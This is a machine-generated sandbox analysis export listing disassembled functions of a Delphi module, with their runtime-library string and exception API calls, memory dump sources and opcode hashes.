                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011688), ref: 500115DF
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50011688), ref: 50011610
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50011688), ref: 50011615
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011688), ref: 50011632
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50011688), ref: 5001163E
                                                                                                  • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120(00000000,50011688), ref: 50011653
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50011688), ref: 50011661
                                                                                                  • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120(00000000,50011688), ref: 50011666
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@Unicode$System@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$CategoryCheckSymbol$qqr26$Asg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3532062273-0
                                                                                                  • Opcode ID: 02f4e0b453128032bd79c09e3ed692ee6b80c67c9a4282a1909b60d356ae584f
                                                                                                  • Instruction ID: cf5c02718057c24ffe030ee689320cfff37d531f52e15f9273e95cb41984650f
                                                                                                  • Opcode Fuzzy Hash: 02f4e0b453128032bd79c09e3ed692ee6b80c67c9a4282a1909b60d356ae584f
                                                                                                  • Instruction Fuzzy Hash: C431D030A006899BDF05DFA8EC829EDB7FAAF94200F5842A6E541D7242D771DE81D781
                                                                                                  Function 5000FCA4 Relevance: 18.1, APIs: 12, Instructions: 104COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000FDD0), ref: 5000FCD2
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000FDD0), ref: 5000FCEF
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000FDD0), ref: 5000FD27
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5000FDD0), ref: 5000FD58
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5000FDD0), ref: 5000FD5D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000FDD0), ref: 5000FD7A
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,5000FDD0), ref: 5000FD86
                                                                                                  • @Character@TCharacter@CheckLetterOrDigit$qqr26Character@TUnicodeCategory.RTL120(00000000,5000FDD0), ref: 5000FD9B
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,5000FDD0), ref: 5000FDA9
                                                                                                  • @Character@TCharacter@CheckLetterOrDigit$qqr26Character@TUnicodeCategory.RTL120(00000000,5000FDD0), ref: 5000FDAE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@Unicode$System@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$CategoryCheckDigit$qqr26Letter$Asg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 4166249876-0
                                                                                                  • Opcode ID: 40ee31226fb4796293f06ddc81e8dbef87543a4be0e7f81b875c0f28c5afefb1
                                                                                                  • Instruction ID: 7e8255dbcbdf30cf2898f3883974bde59dcb4dfa51a195c6f4f674c5af2fb4cd
                                                                                                  • Opcode Fuzzy Hash: 40ee31226fb4796293f06ddc81e8dbef87543a4be0e7f81b875c0f28c5afefb1
                                                                                                  • Instruction Fuzzy Hash: E531D330A001999BEF01DFA8E8A25BDB7F6AF54200F9042A7E940D7651D7709F45E781
                                                                                                  Function 5000D350 Relevance: 18.1, APIs: 12, Instructions: 74COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 5000D365
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000D41B), ref: 5000D37C
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000D41B), ref: 5000D3A1
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5000D41B), ref: 5000D3B6
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,5000D41B), ref: 5000D3BF
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,5000D41B), ref: 5000D3C8
                                                                                                  • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(00000000,00000000,5000D41B), ref: 5000D3D1
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,00000000,5000D41B), ref: 5000D3E2
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5000D41B), ref: 5000D3EE
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5000D41B), ref: 5000D3F8
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5000D422), ref: 5000D415
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Unicode$String$AnsiAsg$qqrr20Stringx20System@%$FromLength$qqrr20Str$qqrr27StringiStringusT$us$i0$%x20$Char$qqrx20Char$qqrx27Clr$qqrpvInternalRef$qqrpvT$us$i0$%Unicode$qqrpbuipcuiUtf8
                                                                                                  • String ID:
                                                                                                  • API String ID: 4232215533-0
                                                                                                  • Opcode ID: ad4d0f6f34169782e74c51b16991eb8d356e2d98f7b635619e335aac60af7289
                                                                                                  • Instruction ID: 3b1bd491e4cd28c8667a27129fb9a09298fa26f3dbe235ab3b7280bbe119c3e9
                                                                                                  • Opcode Fuzzy Hash: ad4d0f6f34169782e74c51b16991eb8d356e2d98f7b635619e335aac60af7289
                                                                                                  • Instruction Fuzzy Hash: FE218034B01689ABEB00DBB8D9A299EB7F9EF58200BD04677A104D7251DB70DF42C691
                                                                                                  Function 5000D268 Relevance: 18.1, APIs: 12, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 5000D27D
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(00000000,5000D32F), ref: 5000D292
                                                                                                    • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000D32F), ref: 5000D2B7
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120(00000000,5000D32F), ref: 5000D2CC
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,5000D32F), ref: 5000D2D5
                                                                                                  • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(00000000,00000000,00000000,5000D32F), ref: 5000D2DE
                                                                                                  • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(00000000,00000000,5000D32F), ref: 5000D2E7
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120(00000000,00000000,5000D32F), ref: 5000D2F8
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(00000000,00000000,5000D32F), ref: 5000D302
                                                                                                  • @System@@WStrAsg$qqrr17System@WideStringx17System@WideString.RTL120(00000000,00000000,5000D32F), ref: 5000D30C
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(5000D336), ref: 5000D321
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5000D336), ref: 5000D329
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$String$Wide$Clr$qqrpv$AnsiSystem@%$FromLength$qqrr17Str$qqrr27StringiStringusT$us$i0$%x20Unicode$Asg$qqrr17Char$qqrx17Char$qqrx27FreeInternalRef$qqrpvStringx17T$us$i0$%Unicode$qqrpbuipcuiUtf8
                                                                                                  • String ID:
                                                                                                  • API String ID: 4137807012-0
                                                                                                  • Opcode ID: 9d99f426a5258040bba127735ebeabb60f29094ae9e6efebe0269d1dc8d28938
                                                                                                  • Instruction ID: fe8e2a62b9cd70ac692412814637c9b7d703ad39900a8dd57bf602c3009e5012
                                                                                                  • Opcode Fuzzy Hash: 9d99f426a5258040bba127735ebeabb60f29094ae9e6efebe0269d1dc8d28938
                                                                                                  • Instruction Fuzzy Hash: CF215034A01688ABEB01DBE5D9A199DB7F8EF58200BD04277A500E7251DB70DF419795
                                                                                                  Function 50026498 Relevance: 18.1, APIs: 12, Instructions: 58filewindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@ExceptionErrorMessage$qqrp14System@TObjectpvpbi.RTL120(00000800), ref: 500264B1
                                                                                                    • Part of subcall function 500262D0: VirtualQuery.KERNEL32(?,?,0000001C,00000000,5002647C), ref: 50026303
                                                                                                    • Part of subcall function 500262D0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026327
                                                                                                    • Part of subcall function 500262D0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026342
                                                                                                    • Part of subcall function 500262D0: @Sysutils@AnsiStrRScan$qqrpbb.RTL120(?,?,00000105), ref: 50026366
                                                                                                    • Part of subcall function 500262D0: @Sysutils@StrLCopy$qqrpbpxbui.RTL120(?,?,00000105), ref: 5002637B
                                                                                                    • Part of subcall function 500262D0: @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(?,?,00000105), ref: 50026392
                                                                                                    • Part of subcall function 500262D0: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000105), ref: 5002639E
                                                                                                    • Part of subcall function 500262D0: @Sysutils@StrLen$qqrpxb.RTL120(?,?,00000105), ref: 500263A7
                                                                                                    • Part of subcall function 500262D0: @System@FindResourceHInstance$qqrui.RTL120(0000FFD6,?,00000100,?,?,00000105), ref: 500263D7
                                                                                                    • Part of subcall function 500262D0: LoadStringW.USER32(00000000,0000FFD6,?,00000100), ref: 500263DD
                                                                                                    • Part of subcall function 500262D0: @System@TObject@ClassName$qqrv.RTL120(?,?,00000105), ref: 500263EA
                                                                                                    • Part of subcall function 500262D0: @Sysutils@StrLFmt$qqrpbuit1px14System@TVarRecxi.RTL120(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,00000105), ref: 50026454
                                                                                                  • @System@Flush$qqrr15System@Textfile.RTL120(00000800), ref: 500264C5
                                                                                                  • @System@@_IOTest$qqrv.RTL120(00000800), ref: 500264CA
                                                                                                  • CharToOemW.USER32(?,?), ref: 500264DF
                                                                                                  • @Sysutils@StrLen$qqrpxc.RTL120(?,00000000,00000800), ref: 500264F2
                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000800), ref: 50026502
                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000800), ref: 50026508
                                                                                                  • GetStdHandle.KERNEL32(000000F4,50026578,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000800), ref: 5002651D
                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,50026578,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000800), ref: 50026523
                                                                                                  • @System@FindResourceHInstance$qqrui.RTL120(0000FFD7,?,00000040,00000800), ref: 5002653F
                                                                                                  • LoadStringW.USER32(00000000,0000FFD7,?,00000040), ref: 50026545
                                                                                                  • MessageBoxW.USER32(00000000,?,?,00002010), ref: 5002655E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Sysutils@$File$String$ClassFindHandleInstance$qqruiLoadModuleNameResourceSystem@@Write$AnsiCharChar$qqrx20Class$qqrp14Copy$qqrpbpxbuiErrorExceptionFlush$qqrr15Fmt$qqrpbuit1px14Len$qqrpxbLen$qqrpxcMessageMessage$qqrp14MetaName$qqrvObject@Objectp17ObjectpvpbiQueryRecxiScan$qqrpbbSystem@@_Test$qqrvTextfileUnicodeVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 682148156-0
                                                                                                  • Opcode ID: f56c95302a1c536e387dbb5fa9a6a78a2f0151cc5fefaab932fbb0d1fae44bcc
                                                                                                  • Instruction ID: f4590949c087f8aafe1dbb2c7c4ba6b3c2bf3514901ac64eb4a44afc2398d7eb
                                                                                                  • Opcode Fuzzy Hash: f56c95302a1c536e387dbb5fa9a6a78a2f0151cc5fefaab932fbb0d1fae44bcc
                                                                                                  • Instruction Fuzzy Hash: 001194715456C17AF320DBE0EC56FDB73DC6B24310F808B16B298D60E2DE34E64487A2
                                                                                                  Function 5001138C Relevance: 16.6, APIs: 11, Instructions: 123COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500114E2), ref: 500113BB
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 500113D8
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 50011410
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,500114E2), ref: 50011441
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500114E2), ref: 50011446
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 50011463
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 5001148D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 500114AC
                                                                                                  • @Character@TCharacter@IsSurrogatePair$qqrxbxb.RTL120(00000000,500114E2), ref: 500114BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$Asg$qqrr20Except$qqrvException@$bctr$qqrp20Pair$qqrxbxbRaiseRecpx14RecxiStringx20SurrogateSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1194877190-0
                                                                                                  • Opcode ID: a9b30fe3f2403a0302ec5bf63648d9ce3e1555fb2ec83c40806ccb76183649ed
                                                                                                  • Instruction ID: 5b2fcd8ece5833fd3d9f2a349bbedbb4582ae67bb33aebb72d879f9c31b886ea
                                                                                                  • Opcode Fuzzy Hash: a9b30fe3f2403a0302ec5bf63648d9ce3e1555fb2ec83c40806ccb76183649ed
                                                                                                  • Instruction Fuzzy Hash: 9E419D30A00289ABDF15DFA8ED81AEEB7F5EF44700F5442A6E940D7245E774EE81C790
                                                                                                  Function 500244D8 Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                    • Part of subcall function 500243A4: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                    • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50024620), ref: 50024537
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50024620), ref: 5002454D
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50024620), ref: 5002455D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50024620), ref: 5002457A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50024620), ref: 500245A2
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000000,50024620), ref: 500245B6
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,?,00000000,50024620), ref: 500245C0
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,?,00000000,50024620), ref: 500245CD
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000400,00000001,00000000,?,00000000,?,?,00000000,50024620), ref: 500245F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Char$qqrx20EnsureString$qqrr20$Asg$qqrr20CompareCopy$qqrx20Len$qqrx20StringiiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 4220554184-0
                                                                                                  • Opcode ID: 96b5e629e91b5904e2abc59b103f2b6dd95f87f350b544be9f16c5b7b18ccc62
                                                                                                  • Instruction ID: 0917f6d901124ccc03c99a1b7cbd9fd473add03b710357cd351074ee3f025ca5
                                                                                                  • Opcode Fuzzy Hash: 96b5e629e91b5904e2abc59b103f2b6dd95f87f350b544be9f16c5b7b18ccc62
                                                                                                  • Instruction Fuzzy Hash: 7F41C530A016969FDF41DFB8E951A9EF7F9EF84200F504266E940D7246D770DE41C741
                                                                                                  Function 5002A640 Relevance: 16.6, APIs: 11, Instructions: 118COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@GetModuleName$qqrui.RTL120(00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A67B
                                                                                                  • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A686
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6A3
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6B2
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6B7
                                                                                                  • @System@UTF8ToString$qqrpxcxi.RTL120(?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6E5
                                                                                                  • @Sysutils@StrLen$qqrpxc.RTL120(?,?,?,00000003,00000000,00000000), ref: 5002A6F7
